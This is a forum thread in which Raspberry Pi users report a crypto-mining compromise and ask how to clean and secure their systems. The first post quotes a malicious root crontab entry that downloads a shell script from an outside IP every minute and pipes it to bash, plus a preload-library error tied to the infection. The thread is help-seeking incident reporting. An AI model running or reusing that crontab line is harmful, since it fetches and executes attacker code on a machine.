Page 1 of 1

Virus or not ?

Posted: Thu Jun 13, 2019 7:23 am
by Martial
Hi,
I use 2 rpi (one rpi3B and 1 rpi2b) with raspbian and domoticz.
On the rpi3, i had this problem:
- messages
ERROR: ld.so: object '/usr/local/lib/libkk.so' from /etc/ld.so.preload cannot be preloaded (cannot open shared object file): ignored.
ERROR: ld.so: object '/usr/local/lib/libkk.so' from /etc/ld.so.preload cannot be preloaded (cannot open shared object file): ignored.
- in root crontab
* * * * * (curl -s http://107.173.102.59/mr.sh||wget -q -O - http://107.173.102.59/mr.sh)|bash -sh

I have done a restore, changed pi and root password, closed NAT rules from my box (public 8080 --> 80: domoticz, 1194: openvpn).
And the problem seems to be fixed.

Do you known this attack ?
What can i do before reopenning the ports ?
Thank you for you help
Martial

Re: Virus or not ?

Posted: Thu Jun 13, 2019 8:43 am
by jamesh

Re: Virus or not ?

Posted: Thu Jun 13, 2019 10:54 am
by rutgercjonaker
I have also got it. :shock:
Is it "mr.sh"?
I have tried remove some temp files but no luck.
Anoy one knows how to remove it without go back to an old backup?

Re: Virus or not ?

Posted: Thu Jun 13, 2019 11:22 am
by jamesh
https://discourse.nodered.org/t/cryptom ... rvers/3454

Reformat the SD card and ensure you follow sensible security policies when opening device to the internet.

Re: Virus or not ?

Posted: Fri Jun 14, 2019 8:53 am
by Martial
thank you Jamesh,
Do you know the most likely door they used to enter ?
the web server of domoticz ?
openvpn ?
I had already changed the passwords of root and pi. Can I find a trace in a log system of their entry into my system ?

Regards

Re: Virus or not ?

Posted: Fri Jun 14, 2019 9:12 am
by jamesh
Martial wrote:
Fri Jun 14, 2019 8:53 am
thank you Jamesh,
Do you know the most likely door they used to enter ?
the web server of domoticz ?
openvpn ?
I had already changed the passwords of root and pi. Can I find a trace in a log system of their entry into my system ?

Regards
I have no idea. Sorry.

Re: Virus or not ?

Posted: Mon Jun 17, 2019 7:34 pm
by SouD
Hi guys,
I got the same crypto malware / virus.

I deleted all Cron entries, temporaries folders, blocked all ports / ip but it still persists.
It stopped for few days but came back (I'm tracking with wireshark)

I'm going to reinstall all the system one more time...
Martial, can you tell me if your system has been hacked again right after the reinstall ?
Can I go mind free reconfiguring the PI for the XXXXXXXth time ? Or should I pray for my IP to not be listed on a wrong list ?

BTW I'm using the raspberry for octoprint / openvpn / domoticz only. I have an internet acces to domoticz for personal project :/
I suspect domoticz...

SouD

Re: Virus or not ?

Posted: Tue Jun 18, 2019 7:44 am
by Martial
SouD wrote:
Mon Jun 17, 2019 7:34 pm

Martial, can you tell me if your system has been hacked again right after the reinstall ?
Can I go mind free reconfiguring the PI for the XXXXXXXth time ? Or should I pray for my IP to not be listed on a wrong list ?
SouD
Hi,
I have not reinstall the system, I used a clone of my SD card which, luckily, was only a few hours old and without the virus.

I have not reopen the NAT rules, I am looking to secure all that before.
Martial